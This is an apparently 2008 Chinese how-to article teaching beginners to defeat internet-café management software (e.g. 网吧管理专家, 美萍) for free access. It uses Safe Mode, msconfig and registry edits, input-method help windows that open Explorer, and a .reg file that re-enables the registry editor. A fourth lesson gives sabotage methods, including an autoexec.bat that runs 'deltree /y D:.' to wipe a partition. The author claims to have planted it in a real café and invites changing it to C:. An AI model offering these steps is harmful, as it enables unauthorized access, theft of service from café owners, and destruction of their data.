菜鳥(niǎo)的網(wǎng)吧常見(jiàn)漏洞入侵
互聯(lián)網(wǎng) 發(fā)布時(shí)間:2008-10-08 19:37:21 作者:佚名
我要評(píng)論
第一課 首先試試“安全模式”漏洞。
到網(wǎng)吧后開(kāi)機(jī)(不要管理員解鎖),一會(huì)兒屏幕出現(xiàn)“Starting Windows ……”時(shí),按下"F5"鍵啟動(dòng)到“安全模式”,在“開(kāi)始”→“運(yùn)行”框
第一課 首先試試“安全模式”漏洞。
到網(wǎng)吧后開(kāi)機(jī)(不要管理員解鎖),一會(huì)兒屏幕出現(xiàn)“Starting Windows ……”時(shí),按下"F5"鍵啟動(dòng)到“安全模式”,在“開(kāi)始”→“運(yùn)行”框中輸入“msconfig”(回車(chē)),打開(kāi)“系統(tǒng)配置實(shí)用程序”,用鼠標(biāo)單擊“啟動(dòng)”標(biāo)簽,去掉所有與網(wǎng)管軟件有關(guān)的項(xiàng),也可以在運(yùn)行框中輸入“regedit”打開(kāi)注冊(cè)表,刪除注冊(cè)表“HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun”下的相關(guān)鍵值,更殘忍的干脆把網(wǎng)管軟件給卸載掉,重新啟動(dòng)計(jì)算機(jī)后,就可以免費(fèi)上網(wǎng)了。是不是很簡(jiǎn)單?不過(guò)可要當(dāng)心網(wǎng)吧老板!如果“F5”鍵被屏蔽了,則應(yīng)該先修改“msdos.sys”??纯聪旅娴?ldquo;輸入法”漏洞,大家就知道怎么修改了。
第二課(本課以“網(wǎng)吧管理專(zhuān)家”為例)
照樣先開(kāi)機(jī)(啟動(dòng)過(guò)程別按“F5”),沒(méi)有讓管理員解鎖的計(jì)算機(jī)在桌面上有一密碼框,是用于驗(yàn)證用戶(hù)身份的。這里分為會(huì)員和管理員,兩種身份分別具有不同的使用權(quán)限。我不是管理員,所以我不知道管理員密碼,在座有哪位知道的?(你不用拼命搖頭啦?。](méi)有密碼照樣能進(jìn)入!我們可以繞到密碼框后面去。用鼠標(biāo)單擊“會(huì)員卡號(hào)”框,利用“ctrl shift”或“Ctrl Space(空格鍵)”調(diào)出輸入法,然后隨意輸入一個(gè)字母,在彈出的輸入框上單擊鼠標(biāo)右鍵,看看有沒(méi)有“幫助”。沒(méi)有的話(huà)就用“Ctrl Shift”切換輸入法,直到找出“幫助”后單擊它。鼠標(biāo)的移動(dòng)范圍被限制了,可以這樣破解它:按下“Alt Space”,在彈出的標(biāo)題欄菜單上(用鍵盤(pán))選擇“移動(dòng)”,再回車(chē)兩下就OK了?;A(chǔ)打好了,現(xiàn)在讓我們看看這個(gè)網(wǎng)吧里有什么好東東,用鼠標(biāo)單擊“幫助”的標(biāo)題欄圖標(biāo)(有一種幫助沒(méi)有這個(gè)圖標(biāo),這種幫助好像沒(méi)什么利用價(jià)值)。打開(kāi)控制菜單后,再單擊“跳至 URL(J) ...”,在彈出的輸入框中輸入網(wǎng)址或盤(pán)符都可以,先去C盤(pán)看看,輸入“C:”或“file:///C:/”。我找…… 似乎沒(méi)什么好玩的。你看那網(wǎng)管軟件,就放在這么顯眼的地方,也不怕被人執(zhí)行“Uninstall.exe”。…… 下面就開(kāi)始上網(wǎng)了。:)去“新浪”逛逛,打開(kāi)“跳至 URL(J)...”框,輸入“www.sina.com.cn”(“回車(chē)”),大家讓一讓?zhuān)l(fā)生什么事了?網(wǎng)頁(yè)內(nèi)容竟然在“幫助”里顯示出來(lái)了!如果要去雅虎網(wǎng)站,還得再單擊“跳至 URL(J) ...”,麻煩了點(diǎn),不如去桌面上找個(gè)IE更方便些,這次還是得單擊“跳至 URL(J)...”,輸入“c:windowsdesktop”(回車(chē)),或者在剛才打開(kāi)的c盤(pán)上任意選擇一個(gè)文件夾,按“shift Enter(回車(chē))”,調(diào)出資源管理器,也可以到達(dá)桌面。
有些人想要管理員密碼,你可以自已來(lái)設(shè)置一個(gè),我慣用的方法是:打開(kāi)注冊(cè)表,刪除“[Hkey_Local_MachineSoftware萬(wàn)象幻境專(zhuān)家系列管理軟件]”下的鍵名“計(jì)算機(jī)解鎖密碼”和“運(yùn)行設(shè)置程序密碼”的鍵值(另外還有其他的密碼,均已被編譯,要?jiǎng)h除就隨你便啦?。└耐旰笸顺鲎?cè)表并重新啟動(dòng)計(jì)算機(jī),密碼框不見(jiàn)了,然后依次單擊“開(kāi)始→設(shè)置→運(yùn)行設(shè)置程序”,倘若你覺(jué)得該網(wǎng)吧限制太高,不妨把它設(shè)置低一點(diǎn)。如果注冊(cè)表編輯器被禁止,就當(dāng)我上面的話(huà)沒(méi)說(shuō),我們可以用這種方法破解:
1.在IE地址欄內(nèi)輸入“c:”,回車(chē)。
2.單擊“文件”菜單,新建一份文本文檔,輸入如下代碼:
以下是代碼片段:
Regedit4
[HKEY_USERS.DEFAULTSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem]
"DisableRegistryTools"=dword:01000000
將文件另存為“1.reg”,把它雙擊安裝后就可以使用注冊(cè)表編輯器了。剛才提到怎樣解除“F5”的限制,利用“幫助”漏洞來(lái)解除可以,但是我想利用“快速提示”漏洞。
第三課 “輸入法”中的“快速提示”漏洞
這節(jié)課教大家什么?嗯!是“輸入法”中的“快速提示”漏洞,目前僅有“五筆加加”輸入法有這個(gè)漏洞。照上節(jié)課教的,不過(guò)這次要大家找的是“快速提示”,而不是“幫助”,切換輸入法,找到“快速提示”后單擊它,這時(shí)出現(xiàn)一個(gè)IE窗口(不是太菜的你應(yīng)該知道干什么用的,上網(wǎng)用的唄!),鼠標(biāo)移動(dòng)范圍被限制了,破解它(上節(jié)課教過(guò)了,但是如果IE窗口是最大化的,則應(yīng)該先在控制菜單中選擇“恢復(fù)為小窗口”后再“移動(dòng)”,再按“回車(chē)”),這樣便可免費(fèi)上網(wǎng)了,需要打開(kāi)桌面,最簡(jiǎn)單的方法是:在IE地址欄上輸入“桌面”(回車(chē))?;仡櫼幌碌谝还?jié)課主要說(shuō)了什么……嗯!利用“F5”漏洞免費(fèi)上網(wǎng),大多被屏蔽掉了,第二節(jié)課說(shuō)過(guò)要利用“快速提示”漏洞來(lái)解除它。怎么做呢?(大家筆拿起來(lái)做些筆記),“msdos.sys”文件在C盤(pán)根目錄下一般是以“隱藏”和“只讀”形式儲(chǔ)存的,我們需要先去掉它的“只讀”屬性,要不然無(wú)法對(duì)它做任何修改,在IE地址欄上輸入“file:///C:/command.com”回車(chē),打開(kāi)“ms-dos方式”,在提示符下輸入 “attrib -r c:msdos.sys”(回車(chē))以去掉“只讀”屬性,再返回到IE地址欄上輸入“file:///C:/msdos.sys”(回車(chē)),把“打開(kāi)方式”設(shè)為“記事本”,把“option”下的“BootKeys”的值改為“1”,保存退出。重新啟動(dòng)計(jì)算機(jī)便可使修改生效。
上面講的都是以“網(wǎng)吧管理專(zhuān)家”網(wǎng)管軟件為例,如果是“美萍”控制的計(jì)算機(jī),得先打開(kāi)“開(kāi)始→會(huì)員登陸”,接下來(lái)與“網(wǎng)吧管理專(zhuān)家”操作過(guò)程相同。再補(bǔ)充一點(diǎn),其實(shí)免費(fèi)上網(wǎng)還有一種方法,不過(guò)成功率不高,就是使網(wǎng)管軟件出錯(cuò),我是用鍵盤(pán)上的“Ctrl、Shift、Alt”三個(gè)鍵中任一鍵或任兩鍵配合其他鍵狂按,結(jié)果網(wǎng)管軟件報(bào)錯(cuò)退出,“我的電腦”和“回收站”等都出現(xiàn)在桌面上了。
第四課 一些破壞網(wǎng)吧數(shù)據(jù)的方法(那位耳朵伸得那么長(zhǎng),想必是網(wǎng)德不善者)。
破壞1(破壞級(jí)別:中):
在IE“地址欄”或“jump to URL”中輸入“file:///c:/windows/control.exe”,打開(kāi)“控制面板→ 添加/刪除程序”,卸載掉你“感興趣”的應(yīng)用程序。
破壞2(破壞級(jí)別:中→高):
為了防止文件被刪除,網(wǎng)管軟件一般都屏蔽了鼠標(biāo)右鍵,并且連鍵盤(pán)上的“Delete”和“Shift Delete”也無(wú)效,不過(guò)據(jù)我所知,在“網(wǎng)吧管理專(zhuān)家”控制下的數(shù)據(jù)可以用“Ctrl D”來(lái)刪除。 so.bitsCN.com網(wǎng)管資料庫(kù)任你搜
破壞3(破壞級(jí)別:高):
修改C盤(pán)根目錄下的“autoexec.bat”文件為如下代碼:
以下是代碼片段:
@echo off
path=c:windows;c:windowscommand
smartdrv >nul
deltree /y D:. >nul
這些代碼是我前段時(shí)間在某網(wǎng)吧里預(yù)留的,后果只是使硬盤(pán)D分區(qū)的數(shù)據(jù)全部丟失而已,但計(jì)算機(jī)仍可啟動(dòng)(因?yàn)椴僮飨到y(tǒng)被裝在C盤(pán)),若將第四段代碼的“D:”改為“C:”,有什么后果?你試試就知道了,像我這樣心地善良,樂(lè)于助人的人,是不會(huì)那么做的。
相關(guān)文章

什么是CC攻擊 判斷網(wǎng)站是否被CC攻擊并且如何防御CC攻擊
CC主要是用來(lái)攻擊頁(yè)面的,大家都有這樣的經(jīng)歷,就是在訪(fǎng)問(wèn)論壇時(shí),如果這個(gè)論壇比較大,訪(fǎng)問(wèn)的人比較多,打開(kāi)頁(yè)面的速度會(huì)比較慢,對(duì)不?!一般來(lái)說(shuō),訪(fǎng)問(wèn)的人越多,論壇的頁(yè)2024-01-06
Windows系統(tǒng)安全風(fēng)險(xiǎn)-本地NTLM重放提權(quán)
入侵者主要通過(guò)Potato程序攻擊擁有SYSTEM權(quán)限的端口偽造網(wǎng)絡(luò)身份認(rèn)證過(guò)程,利用NTLM重放機(jī)制騙取SYSTEM身份令牌,最終取得系統(tǒng)權(quán)限,該安全風(fēng)險(xiǎn)微軟并不認(rèn)為存在漏洞,所以2021-04-15
這篇文章主要介紹了文件上傳漏洞全面滲透分析小結(jié),這里主要為大家分享一下防御方法,需要的朋友可以參考下2021-03-21- 這篇文章主要介紹了sql手工注入語(yǔ)句&SQL手工注入大全,需要的朋友可以參考下2017-09-06
- 這篇文章主要介紹了詳解Filezilla server 提權(quán),需要的朋友可以參考下2017-05-13
FileZilla Server 2008 x64 提權(quán)與防御方法
這篇文章主要介紹了FileZilla Server 2008 x64 提權(quán)與防御方法,需要的朋友可以參考下2017-05-13https加密也被破解 HEIST攻擊從加密數(shù)據(jù)獲取明文
不久之前我們說(shuō)過(guò)關(guān)于http和https的區(qū)別,對(duì)于加密的https,我們一直認(rèn)為它是相對(duì)安全的,可今天要講的是,一種繞過(guò)HTTPS加密得到明文信息的web攻擊方式,不知道這消息對(duì)你2016-08-10iPhone和Mac也會(huì)被黑 一條iMessage密碼可能就被盜了
一直以來(lái)蘋(píng)果系統(tǒng)的安全性都是比安卓要高的,但是再安全的系統(tǒng)也免不了漏洞,蘋(píng)果也一樣。最近爆出的新漏洞,只需要接收一條多媒體信息或者iMessage就會(huì)導(dǎo)致用戶(hù)信息泄露。2016-07-27- 國(guó)家正在修正關(guān)于黑客方面的法律法規(guī),有一條震驚黑客圈的“世紀(jì)佳緣”起訴白帽黑客事件,深深的傷害了廣大黑客們的心,加上扎克伯格和特拉維斯·卡蘭尼克賬號(hào)被盜,于是黑2016-07-11
如何逆向破解HawkEye keylogger鍵盤(pán)記錄器進(jìn)入攻擊者郵箱
面對(duì)惡意郵件攻擊,我們就只能默默忍受被他攻擊,連自我保護(hù)能力都沒(méi)有談什么反抗?讓人痛快的是,如今有了解決辦法,逆向破解鍵盤(pán)記錄器,進(jìn)入攻擊者郵箱2016-07-06


